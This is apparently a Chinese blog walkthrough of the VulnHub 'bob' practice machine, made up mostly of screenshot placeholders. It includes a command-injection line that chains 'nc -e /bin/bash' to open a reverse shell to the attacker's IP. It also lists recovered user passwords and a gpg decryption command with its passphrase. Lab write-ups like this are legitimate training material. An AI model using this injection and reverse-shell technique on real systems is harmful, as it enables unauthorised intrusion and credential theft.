Avatar {{帝力于我何有哉}} 不疯魔,不成活。 Be obsessed, or be average.

vulnhub >_ bob

Published on 09 Nov 2020

bob

image-20200619064614371

image-20200619064801608

image-20200619071632161

image-20200619073444169

image-20200619073622557

直接nc回弹shell会被过滤掉,试一试用命令连接

id || nc -e /bin/bash 10.10.10.128 1337		#失败
id && nc -e /bin/bash 10.10.10.128 1337		#成功

image-20200619081420128

home下有4个用户,bob目录下有隐藏的旧密码文件

image-20200619083020352

jc:Qwerty
seb:T1tanium_Pa$$word_Hack3rs_Fear_M3

image-20200619083557481

elliot:theadminisdumb

image-20200619084327709

secret挖到最后

image-20200619084614096

回到之前的文档目录

image-20200619084829225

看来只剩下login.txt.gpg文件了,这是个加密的txt文件

做了一些枚举,仍没发现有用的线索。

仔细回看之前得到的信息发现

image-20200619085618690

HARPOCRATES

image-20200619090613529

使用nc传回kali,

尝试用之前的密码解密

gpg --batch --passphrase HARPOCRATES -d login.txt.gpg

image-20200619091300916

bob:b0bcat_

image-20200619091820165

image-20200619091913730

related posts